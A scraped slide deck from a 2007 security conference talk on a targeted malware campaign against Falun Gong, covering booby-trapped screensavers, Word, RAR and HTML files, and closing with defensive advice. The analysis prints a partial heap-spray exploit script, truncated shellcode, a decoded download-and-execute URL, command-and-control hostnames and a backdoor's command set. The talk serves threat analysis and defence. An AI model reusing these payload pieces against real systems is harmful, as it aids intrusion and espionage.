SlideShare uma empresa Scribd logo
1 de 41
Baixar para ler offline
Crouching Powerpoint,
                            Hidden Trojan




24th Chaos Communications Congress
Berlin, December 27th 2007           Maarten Van Horenbeeck
Contents
Information Operations & Targeted Attacks
Information storage: the village and the city
The value of information

A targeted attack spree
Single target attack covering 2005 through 2007

Defence against the dark arts
Q&A
                                                  2
Information in the village

• Information flows used to be constrained by:
  • Well known information characteristics
  • Relatively few social “roles”
• Limited information exchange




                                                 3
... and the city




• Now, you have:
   • Strong communication links
   • Unpredictable properties of information
   • Value depends on time and situation
                                               4
Information Operations

• Gain an information advantage by
  • Increasing our situational awareness;
  • Deteriorating competitor’s information.


• Reality is based on information, composed of
  data interpreted in a certain context using
  knowledge

• Each of these can be attacked in various ways

                                                  5
IO in the US

• Information Warfare: a US paradigm

“The integrated employment of the core capabilities of
  electronic warfare [EW], computer network operations
  [CNO], psychological operations [PSYOP], military
  deception and operations security [OPSEC] with
  specified supporting and related capabilities to influence
  automated decisionmaking while protecting our own.”
                 Joint Doctrine for Information Operations (2006), US DoD




                                                                        6
IO in China

• Internally generated, not a US copy
• From 20+ definitions (90’s) to a limited set
  of definitions today
  – Most deal with ‘control’ as an objective
    instead of ‘victory’
  – Embedded concept of People’s War
  – Use of stratagems


                                                 7
The 36 Stratagems

• Deception devices
• 36 stratagems, over 300 years old

         “Deceive the sky to cross the ocean”
                       瞞天過海
Act openly and hide in what is normal:
  benign e-mail with contextually expected content


                                                     8
Targeting methodology
• Identify target data
• Locate concentrations
  • Forums
  • Web portals
  • Companies
• Identify subjects of influence
  • Crawling
  • Human interaction
  • Social networking
                                   9
Targeted e-mail attacks




                          10
2005: Espionage attacks




                          11
A target: Falun Gong

                        • System of mind and body cultivation
                        • Introduced in 1992, consisting of:
                             • Five sets of meditation exercices (Falun Gong);
                             • Set of religious teachings (Falun Dafa)




•Repressed by the People’s Republic of China dating back to July 20, 1999
• Banned because of illegal activities:
    • Threat to social and political stability of the country;
    • Thousands of practitioners have been detained by police;
• PRC ban heavily criticized by human rights activists

                                                                       12
A target: Falun Gong




                       © ClearWisdom.net
                                           13
2005: Screen saver objects




                             14
2005: Screen saver objects

•     Chinese language filename
•     SCR file is in fact PE file
00000040   0e 1f ba 0e 00 b4 09 cd   21 b8 01 4c cd 21 54 68   |........!..L.!Th|
00000050   69 73 20 70 72 6f 67 72   61 6d 20 63 61 6e 6e 6f   |is program canno|
00000060   74 20 62 65 20 72 75 6e   20 69 6e 20 44 4f 53 20   |t be run in DOS |



•     DNS lookup for faluninfo.3322.org
•     Connects on port 80 and opens remote
      administration backdoor


                                                                                    15
2005: Screen saver objects

• Attack scenario for extended compromise
  • Intelligence collection is required




                                            16
2005: Screen saver objects

• “Domain parking”
  • Intelligence collection is not required
  • Only outbound DNS queries




                                              17
2005: Screen saver objects

• Virus detection, one year later:




                                     18
2006: HuJintao.doc

• Benign looking filename




                            19
2006: HuJintao.doc

Simultaneously, the file

• Exploits MS05-035: arbitrary code
  execution through MS Word vulnerability
• Connects to john0604.3322.org port 7128
  • Still active after more than one year
  • Port forwarder to a ChinaNet host


                                            20
2006: HuJintao.doc

• Embedded trojan is slightly modified
  version of W32/Riler.J
  • Full access to compromised system
  • Ability to drop and create new files


• Riler family listed in NISCC bulletin



                                           21
2006: HuJintao.doc

Riler network traffic:
  NAME:
  NAME: QADESH.VER: Stealth 2.6 MARK: fl510 OS:   NT
    5.0.L_IP: 10. 2.0.18.ID: NoID.
  LONG:0508_LOG.txt
  NULL
  AUTO
  ERR code = 02
  SNIF
  ERR code = 02
  WAKE
  WAKE

                                                   22
2006: HuJintao.doc

Capabilities:
LOCK SEND WAKE NAME MOON KEEP DISK FILE
DONE DOWN LONG MAKE ATTR KILL LIKE SEEK
READ DEAD DDLL AUTO READY

MOON & DISK grant access to local data
DEAD kills the backdoor
LIKE grants a remote cmd32.exe shell

The attacker has full access to data on the system




                                                     23
2006: HuJintao.doc
• Anti virus coverage in 2007:

AntiVir 7.3.1.48 04.02.2007 HEUR/Crypted
AVG 7.5.0.447 04.02.2007 Dropper.Mdrop.O
BitDefender 7.2 04.02.2007 Dropped:Trojan.Riler.J
DrWeb 4.33 04.02.2007 Exploit.FirstTable
F-Secure 6.70.13030.0 04.02.2007 Trojan-Dropper.MSWord.1Table.ax
Kaspersky 4.0.2.24 04.02.2007 Trojan-Dropper.MSWord.1Table.ax
McAfee 4998 04.02.2007 Exploit-1Table
Symantec 10 04.02.2007 Bloodhound.Olexe
Webwasher-Gateway 6.0.1 04.02.2007 Heuristic.Crypted

• 36 solutions tested,
   • 9 identified the file as malicious
   • 15 detected the actual embedded executable
                                                                   24
April 2007: HTML/JS dropper




                              25
April 2007: HTML/JS dropper
• E-mail sent with nothing but an HTML file
  attached. Looks benign.
• Message originated in Taiwan, but sent through
  Australian mail server
• However, scary script tag
evilObject.push( evilString );
       try
       {
                var obj =
  document.getElementById('target').object;
                obj.CSVData=evilObject[0];
       }
       catch(e)
       {
   }

                                               26
April 2007: HTML/JS dropper
• Contains shellcode

var ToWhare = 0x0D0D0D0D;
var KernelIsWhat =
    unescape(quot;%u8b55%u81ec%ue0ec%u0002%u5300%u5756%u6460%u158b%u0030%u0000
    %udce9%u0003%u8f00%ub485%ufffd%u8bff%u0c42%u708b%uad1
…hexadecimal…
    065%u696f%u746e%u7265%u4300%u6572%u7461%u5065%u6f72%u6563%u7373%u0041%
    u7845%u7469%u7250%u636f%u7365%u0073%u7255%u6d6c%u6e6f%u642e%u6c6c%u5500
    %u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%u0000%u0000quot;);

• Final part of shellcode decodes to:

http://70.85.25.174:3721/aeexTempcsrse.exedceme./xc start iexplore.exeè
   e$CGmtmondLineeAWGntoisdiweDtrrcAoGyetFileSi eC
   reateFileAoCelasdHenWlriteFileaRFeldeSetFilePointereCtrPaoeerscAsExitPrs
   oseUrlmon.dllLUoRnDowdloaiTeFAl

• Protox.O backdoor application


                                                                         27
April 2007: HTML/JS dropper

• Virus detection of dropper non-existent




                                            28
2007: Ongoing Word attacks

• Mid-May: Word exploit
  Installs backdoor, connects to Taiwan

• End of May: Word exploit
  Installs Riler backdoor, connects to telephone
  company in Montana

• July 2nd & 3rd: Word exploit
  Installs backdoor, connects to Hong Kong &
  Taiwan

                                                   29
July 2007: WinRAR

•   RAR file crashes WinRAR 3.5
•   Executes on Traditional Chinese systems
•   Backdoor with Keylogger
•   No Anti virus detection
    “This case is not about infection by some virus or
    Trojan horse but about crash of one particular
    program version (or library) on incorrect file.”
                                 Anonymous anti virus vendor ☺


                                                            30
2007: The attacks continue

• Mid August: Malicious Powerpoint
 Installs backdoor, connects to Taiwan


• Late August: Malicious RAR archive
 Installs key logging backdoor


• September: Malicious Powerpoint
 Installs backdoor, connects to Taiwan

                                         31
September: the World Series

• 5 Word exploits in one week
  •   Each adds slight changes to avoid detection
  •   Exploit CVE-2006-2492
  •   Connect to CNC Group Hebei Province
  •   Different hostnames, same IP address

• One day later: HTML/JS dropper
  • New backdoor family
  • Same control server as in April
                                                    32
October: the Zero-day threat

• MS07-060: Word memory corruption flaw
• Attack nine hours prior to patch release
• Increased complexity: triple payload
  • Disable anti virus
  • Disable HIPS
  • Install trojan and connect to Taiwan


• No anti virus coverage (one false positive)
                                             33
Zero-day: Rapid Development




• Reuse of existing code
  • Existing HIPS killer
  • Visual Studio “Hello World” application
• Fit for purpose & fast deployment
                                              34
Some quick statistics
                 Targeted software



                 1    2
             1

         2
                                            HTML dropper
                                            Word
                                            WinRAR
                                            Pow erpoint
                                            Excel


                      15




        Covers April through October 2007
                                                           35
Some quick statistics
                           Attacks per month

     9
     8
     7
     6
     5
     4
     3
     2
     1
     0
                           ne



                                    ly
           ril




                                                         r



                                                                  er
                                            t
                   ay




                                                       be
                                             s
                                  Ju
         Ap




                                           gu




                                                                ob
                         Ju
                  M




                                                      em
                                         Au




                                                              ct
                                                             O
                                                   pt
                                                 Se
                                Month in 2007



                 Covers April through October 2007
                                                                       36
Threat agents
• Several groups known to use these attacks
  • NCPH
  • HUC
  • Titan Rain incident


• Attribution generally difficult
  • Trojans, backdoors and rootkits are exchanged
  • Control servers not shared, often unique
  • Motive and techniques become discriminators

                                               37
Defence against the dark arts




                                38
Defence against the dark arts

• Anti malware
  • Blocking is more important than scanning
  • Diversify desktop and gateway
  • AV solutions have different properties
     • Packed binaries
     • Retrospective testing
     • Sandboxing has limited value


• Software hardening
  • MoICE, safe mode
  • Software asset control
  • Host IPS technologies

                                               39
Defence against the dark arts

• Network monitoring
  • Strong egress filtering and proxying
  • Clues in the DNS system


• Awareness Building & Identity Management
  • Identify communications which require trust
  • Make them trustworthy


• Security Intelligence
  • Each attack is unique, group may be common
  • Participate in ISACs
  • Response to these attacks requires insight in the threat agent

                                                                     40
Q&A


More information

  Paper at http://www.daemon.be
  maarten@daemon.be




                                  41

Mais conteúdo relacionado

Semelhante a Crouching Powerpoint, Hidden Trojan

Data breach at Target, demystified.
Data breach at Target, demystified.Data breach at Target, demystified.
Data breach at Target, demystified.Cyphort
 
Understanding Malware Lateral Spread Used in High Value Attacks
Understanding Malware Lateral Spread Used in High Value AttacksUnderstanding Malware Lateral Spread Used in High Value Attacks
Understanding Malware Lateral Spread Used in High Value AttacksCyphort
 
MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler Cyphort
 
MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler Marci Bontadelli
 
Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.
Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.
Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.Cyphort
 
Dissecting ZeuS malware
Dissecting ZeuS malwareDissecting ZeuS malware
Dissecting ZeuS malwareCyphort
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerShakacon
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-macCyphort
 
Needlesand haystacks i360-dublin
Needlesand haystacks i360-dublinNeedlesand haystacks i360-dublin
Needlesand haystacks i360-dublinDerek King
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 
Mengenal ZEUS Botnet Lebih Dekat
Mengenal ZEUS Botnet Lebih DekatMengenal ZEUS Botnet Lebih Dekat
Mengenal ZEUS Botnet Lebih DekatCharles Lim
 
15 years through Infosec
15 years through Infosec15 years through Infosec
15 years through InfosecSaumil Shah
 
Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)Nate Lawson
 
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Peter Kálnai
 
Sans london april sans at night - tearing apart a fileless malware sample
Sans london april   sans at night - tearing apart a fileless malware sampleSans london april   sans at night - tearing apart a fileless malware sample
Sans london april sans at night - tearing apart a fileless malware sampleMichel Coene
 

Semelhante a Crouching Powerpoint, Hidden Trojan (20)

Crouching powerpoint, Hidden Trojan
Crouching powerpoint, Hidden TrojanCrouching powerpoint, Hidden Trojan
Crouching powerpoint, Hidden Trojan
 
Data breach at Target, demystified.
Data breach at Target, demystified.Data breach at Target, demystified.
Data breach at Target, demystified.
 
Understanding Malware Lateral Spread Used in High Value Attacks
Understanding Malware Lateral Spread Used in High Value AttacksUnderstanding Malware Lateral Spread Used in High Value Attacks
Understanding Malware Lateral Spread Used in High Value Attacks
 
MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler
 
MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler MMW June 2016: The Rise and Fall of Angler
MMW June 2016: The Rise and Fall of Angler
 
Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.
Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.
Sony Attack by Destover Malware. Part of Cyphort Malware Most Wanted Series.
 
Dissecting ZeuS malware
Dissecting ZeuS malwareDissecting ZeuS malware
Dissecting ZeuS malware
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
Spo2 w22
Spo2 w22Spo2 w22
Spo2 w22
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
603535ransomware
603535ransomware603535ransomware
603535ransomware
 
Needlesand haystacks i360-dublin
Needlesand haystacks i360-dublinNeedlesand haystacks i360-dublin
Needlesand haystacks i360-dublin
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
Mengenal ZEUS Botnet Lebih Dekat
Mengenal ZEUS Botnet Lebih DekatMengenal ZEUS Botnet Lebih Dekat
Mengenal ZEUS Botnet Lebih Dekat
 
15 years through Infosec
15 years through Infosec15 years through Infosec
15 years through Infosec
 
Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)
 
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Sans london april sans at night - tearing apart a fileless malware sample
Sans london april   sans at night - tearing apart a fileless malware sampleSans london april   sans at night - tearing apart a fileless malware sample
Sans london april sans at night - tearing apart a fileless malware sample
 

Último

What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Último (20)

What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

Crouching Powerpoint, Hidden Trojan

  • 1. Crouching Powerpoint, Hidden Trojan 24th Chaos Communications Congress Berlin, December 27th 2007 Maarten Van Horenbeeck
  • 2. Contents Information Operations & Targeted Attacks Information storage: the village and the city The value of information A targeted attack spree Single target attack covering 2005 through 2007 Defence against the dark arts Q&A 2
  • 3. Information in the village • Information flows used to be constrained by: • Well known information characteristics • Relatively few social “roles” • Limited information exchange 3
  • 4. ... and the city • Now, you have: • Strong communication links • Unpredictable properties of information • Value depends on time and situation 4
  • 5. Information Operations • Gain an information advantage by • Increasing our situational awareness; • Deteriorating competitor’s information. • Reality is based on information, composed of data interpreted in a certain context using knowledge • Each of these can be attacked in various ways 5
  • 6. IO in the US • Information Warfare: a US paradigm “The integrated employment of the core capabilities of electronic warfare [EW], computer network operations [CNO], psychological operations [PSYOP], military deception and operations security [OPSEC] with specified supporting and related capabilities to influence automated decisionmaking while protecting our own.” Joint Doctrine for Information Operations (2006), US DoD 6
  • 7. IO in China • Internally generated, not a US copy • From 20+ definitions (90’s) to a limited set of definitions today – Most deal with ‘control’ as an objective instead of ‘victory’ – Embedded concept of People’s War – Use of stratagems 7
  • 8. The 36 Stratagems • Deception devices • 36 stratagems, over 300 years old “Deceive the sky to cross the ocean” 瞞天過海 Act openly and hide in what is normal: benign e-mail with contextually expected content 8
  • 9. Targeting methodology • Identify target data • Locate concentrations • Forums • Web portals • Companies • Identify subjects of influence • Crawling • Human interaction • Social networking 9
  • 12. A target: Falun Gong • System of mind and body cultivation • Introduced in 1992, consisting of: • Five sets of meditation exercices (Falun Gong); • Set of religious teachings (Falun Dafa) •Repressed by the People’s Republic of China dating back to July 20, 1999 • Banned because of illegal activities: • Threat to social and political stability of the country; • Thousands of practitioners have been detained by police; • PRC ban heavily criticized by human rights activists 12
  • 13. A target: Falun Gong © ClearWisdom.net 13
  • 14. 2005: Screen saver objects 14
  • 15. 2005: Screen saver objects • Chinese language filename • SCR file is in fact PE file 00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 |........!..L.!Th| 00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f |is program canno| 00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 |t be run in DOS | • DNS lookup for faluninfo.3322.org • Connects on port 80 and opens remote administration backdoor 15
  • 16. 2005: Screen saver objects • Attack scenario for extended compromise • Intelligence collection is required 16
  • 17. 2005: Screen saver objects • “Domain parking” • Intelligence collection is not required • Only outbound DNS queries 17
  • 18. 2005: Screen saver objects • Virus detection, one year later: 18
  • 19. 2006: HuJintao.doc • Benign looking filename 19
  • 20. 2006: HuJintao.doc Simultaneously, the file • Exploits MS05-035: arbitrary code execution through MS Word vulnerability • Connects to john0604.3322.org port 7128 • Still active after more than one year • Port forwarder to a ChinaNet host 20
  • 21. 2006: HuJintao.doc • Embedded trojan is slightly modified version of W32/Riler.J • Full access to compromised system • Ability to drop and create new files • Riler family listed in NISCC bulletin 21
  • 22. 2006: HuJintao.doc Riler network traffic: NAME: NAME: QADESH.VER: Stealth 2.6 MARK: fl510 OS: NT 5.0.L_IP: 10. 2.0.18.ID: NoID. LONG:0508_LOG.txt NULL AUTO ERR code = 02 SNIF ERR code = 02 WAKE WAKE 22
  • 23. 2006: HuJintao.doc Capabilities: LOCK SEND WAKE NAME MOON KEEP DISK FILE DONE DOWN LONG MAKE ATTR KILL LIKE SEEK READ DEAD DDLL AUTO READY MOON & DISK grant access to local data DEAD kills the backdoor LIKE grants a remote cmd32.exe shell The attacker has full access to data on the system 23
  • 24. 2006: HuJintao.doc • Anti virus coverage in 2007: AntiVir 7.3.1.48 04.02.2007 HEUR/Crypted AVG 7.5.0.447 04.02.2007 Dropper.Mdrop.O BitDefender 7.2 04.02.2007 Dropped:Trojan.Riler.J DrWeb 4.33 04.02.2007 Exploit.FirstTable F-Secure 6.70.13030.0 04.02.2007 Trojan-Dropper.MSWord.1Table.ax Kaspersky 4.0.2.24 04.02.2007 Trojan-Dropper.MSWord.1Table.ax McAfee 4998 04.02.2007 Exploit-1Table Symantec 10 04.02.2007 Bloodhound.Olexe Webwasher-Gateway 6.0.1 04.02.2007 Heuristic.Crypted • 36 solutions tested, • 9 identified the file as malicious • 15 detected the actual embedded executable 24
  • 25. April 2007: HTML/JS dropper 25
  • 26. April 2007: HTML/JS dropper • E-mail sent with nothing but an HTML file attached. Looks benign. • Message originated in Taiwan, but sent through Australian mail server • However, scary script tag evilObject.push( evilString ); try { var obj = document.getElementById('target').object; obj.CSVData=evilObject[0]; } catch(e) { } 26
